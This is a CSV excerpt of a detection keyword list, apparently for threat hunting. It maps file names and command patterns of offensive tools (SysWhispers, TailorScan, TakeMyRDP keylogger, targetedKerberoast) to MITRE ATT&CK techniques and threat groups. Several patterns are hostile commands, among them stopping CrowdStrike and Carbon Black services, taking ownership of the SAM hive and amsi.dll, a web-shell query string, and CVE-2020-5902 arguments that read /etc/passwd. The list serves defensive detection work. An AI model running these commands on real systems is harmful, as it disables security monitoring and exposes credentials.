+"*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/Aomain Admins*","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*SYSTEM\CurrentControlSet\Services\dcrypt*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*System32fileWritePermissions.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*systemctl disable cbdaemon*","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*systemctl disable falcon-sensor.service*","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*systemctl start nessusd*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*systemctl stop cbdaemon*","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*systemctl stop falcon-sensor.service*","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*SysWhispers.git *","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*syswhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*syswhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*syswhispers.py*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"*SysWhispers2*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*syswhispersv2_x86*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*-t * -x lfr -f /etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z" +"*-t * -x rce -a list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z" +"*T0XlCv1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*t3l3machus/BabelStrike*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*t3l3machus/Synergy-httpx*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" +"*TailorScan.exe *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*TailorScan_darwin*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*TailorScan_freebsd*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*TailorScan_linux_*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*TailorScan_netbsd_*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*TailorScan_openbsd_*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*TailorScan_windows_*.exe*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*tailscale up --advertise-routes=*/24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*tailscaled --tun=userspace-networking --socks5-server=*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*take_shellcode.bat*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A",,"N/A",,, +"*TakeMyRDP*logfile.txt*","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","1","95","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" +"*TakeMyRDP.cpp*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*TakeMyRDP.exe*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*TakeMyRDP.git*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*TakeMyRDP.h*","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","1","95","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" +"*TakeMyRDP.sln*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*TakeMyRDP.vcxproj*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*TakeMyRDP2.0*","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","1","95","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" +"*TakeMyRDP-main*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*takeown /f ""C:\windows\system32\config\SAM""*","greyware_tool_keyword","takeown","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*takeown /f C:\Windows\System32\amsi.dll /a*","greyware_tool_keyword","takeown","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A" +"*takeshixx/nmap-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*Taonn/EmailAll*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*target/tomcatwar.jsp?pwd=j&cmd=*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" +"*targetedKerberoast.git*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" +"*targetedKerberoast.py*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" +"*targetedkerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 